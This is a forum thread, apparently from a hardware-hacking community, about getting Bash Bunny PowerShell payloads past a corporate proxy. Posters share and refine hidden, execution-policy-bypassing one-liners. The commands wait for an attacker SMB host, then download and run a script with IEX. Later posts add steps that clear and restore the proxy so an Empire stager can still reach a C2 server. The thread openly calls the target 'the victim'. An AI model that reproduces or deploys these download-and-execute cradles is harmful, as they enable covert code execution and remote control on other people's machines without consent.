Jump to content

Dealing with powershell and proxies in payloads


cyb3rwr3ck

Recommended Posts

Hi there,

I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default.

I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin.

Any ideas?

Best regards!

F

Link to comment
Share on other sites

Have not tried doing network stuff with the bunny with a proxy setting in play.  By default doesn't the proxy only get used for stuff leaving the local network or am I missing something and there is a way to make a machine use the proxy for every kind of network traffic, including local?

If it is the first, I don't think the proxy setting will get in the way of the bunny since the interface for it will come up as a local network (NIC and remote device "Bunny" are on the same subnet).

 

Anyone else wanna correct?  This is all speculation here.

Link to comment
Share on other sites

17 hours ago, PoSHMagiC0de said:

By default doesn't the proxy only get used for stuff leaving the local network or am I missing something and there is a way to make a machine use the proxy for every kind of network traffic, including local?

The thing is that the bunny presents a Network to the Host during this kind of "bring your own network attack". So the proxy is utilized as long as there is no "direct" exception for exactly this bunny network configuration. This will create a connect request to the explicit proxy which dies...

The only thing that should fix this behavior is enforcing this kind of direct request which - in an enterprise setup - is usually done by pac files. I have no idea how to do it temporarily using powershell so this is the goal to achieve.

Link to comment
Share on other sites

Yeah, that is a tuff one.  I do not have a setup to test that but I know powershell has a method to bypass proxy.

Try these 2 ways.  Both are Powershell.

#If you use invoke-webrequest

Invoke-Webrequest -URI "Bashbunny uri" -NoProxy

#If using old school webclient. Use before making request.
[System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()

 

Do not know if these will work but worth a try.

 

Link to comment
Share on other sites

  • 4 weeks later...
On 1/16/2018 at 12:17 AM, PoSHMagiC0de said:

Try these 2 ways.  Both are Powershell.

Alright, had some time to check this out during the weekend.

Invoke-Webrequest: The -NoProxy option seems to be part of PS >= v. 6, so its not reliably to be found on the victim in any way.

This is how it should look like if we want to first check a SMB share for connectivity and then download/execute a payload from it without using the system wide proxy in case of PS >= v6:

powershell -exec Bypass -noP -WindowsStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-Webrequest -UseBasicParsing -Uri '\\<HOST_IN_HERE>\p.txt' -NoProxy);exit}}"

Right now only this one is working reliable (PS < v6, proxy-settings are applied):

powershell -exec Bypass -noP -WindowsStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-Webrequest -UseBasicParsing -Uri '\\<HOST_IN_HERE>\p.txt');exit}}"

The most portable, working solution to circumvent the proxy would be the following one. Of course its way to long to fit into a WIN+R call, so it must be QUACKED to cmd or called from disk.

powershell -exec Bypass -noP -WindowStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {[System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); IEX (New-Object System.Net.WebClient).DownloadString('\\<HOST_IN_HERE>\p.txt');exit}}"

 

I have tested this stuff using an Empire stager. One open point is that the stager is also called without proxy settings which will obviously break the attack in a restrictive environment where we want to retrieve the payload from the BB and reach out to the Internet to our C2 Server using the explicit proxy. To me this is kind of strange because the stager does the proxy resolving stuff on its own. 

So, the new question is: How to reset the proxy settings to the system settings after retrieving the file from the BB. System.Net.GlobalProxySelection does not offer such a method.

Link to comment
Share on other sites

And this is it (works, according  to a quick test):

powershell -exec Bypass -noP "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {$p = [System.Net.WebProxy]::GetDefaultProxy(); $p.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; [System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); $w=(New-Object System.Net.WebClient).DownloadString('\\<BB_IN_HERE>\p.txt'); [System.Net.GlobalProxySelection]::Select = $p; IEX $w;exit}}"
  1. Store default proxy + Creds to $p
  2. Clear proxy
  3. Retrieve script from BB to $w
  4. Select proxy settings from $p
  5. Run script with selected proxy settings
Link to comment
Share on other sites

Or, if you are running something that uses SMB on the bunny to exfiltrate, you might want to leave proxy settings off until script is done and then turn them back on.

Hmm, @NightStalker has a payload called Proxy Interceptor that I just rewrote but ran into a snag.  Proxy settings were being set via registry entries.  Wonder if these .NET classes work the same as I noticed when set in the registry, it takes some time for the setting to kick in versus using the gui

At the same time, for your use, you might can check if there is a proxy first before going through the motions though will make the one liner longer.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...